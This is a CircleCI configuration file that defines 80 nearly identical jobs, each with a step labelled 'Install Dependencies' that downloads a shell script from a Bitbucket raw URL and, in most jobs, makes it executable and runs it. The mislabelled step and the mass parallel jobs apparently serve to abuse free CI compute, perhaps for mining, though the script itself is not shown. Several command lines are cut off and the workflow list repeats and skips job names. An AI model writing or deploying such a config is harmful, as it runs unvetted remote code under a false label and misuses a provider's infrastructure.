version: 2.1
orbs:
  ruby: circleci/ruby@0.1.2 
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh
    aku7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh
    aku8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh
    aku14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh &&
    aku15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku21:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku22:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku23:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku24:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku25:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku26:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku27:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku28:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku29:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku30:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku31:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku32:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh
    aku33:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku34:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku35:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku36:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku37:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku38:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku39:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku40:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku41:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku42:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh &&
    aku43:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh
    aku44:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku45:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku46:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku47:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh &&
    aku48:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku49:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku50:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && 
    aku51:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku52:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku53:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku54:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && 
    aku55:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku56:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku57:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku58:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku59:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh &&
    aku60:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku61:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh
    aku62:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku63:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku64:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku65:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku66:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku67:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh
    aku68:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku69:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku70:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.s
    aku71:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku72:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku73:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku74:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.s
    aku75:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku76:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku77:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku78:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku79:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku80:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Xirclerun/job/raw/d8e78ce19abf804d4f5866745afdc1137f7777ac/tes.sh && chmod u+x tes.sh && ./tes.sh

workflows:
    version: 2.1
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
            - aku11
            - aku12
            - aku13
            - aku14
            - aku15
            - aku16
            - aku17
            - aku18
            - aku19
            - aku20
            - aku21
            - aku22
            - aku23
            - aku24
            - aku25
            - aku26
            - aku27
            - aku28
            - aku29
            - aku30
            - aku31
            - aku32
            - aku33
            - aku34
            - aku35
            - aku36
            - aku37
            - aku38
            - aku39
            - aku40
            - aku41
            - aku42
            - aku43
            - aku44
            - aku45
            - aku46
            - aku47
            - aku48
            - aku49
            - aku50
            - aku61
            - aku62
            - aku63
            - aku64
            - aku65
            - aku66
            - aku67
            - aku68
            - aku69
            - aku60
            - aku61
            - aku72
            - aku73
            - aku74
            - aku75
            - aku76
            - aku77
            - aku78
            - aku79
            - aku70
            - aku71
            - aku72
            - aku73
            - aku74
            - aku75
            - aku76
            - aku77
            - aku78
            - aku79
            - aku80
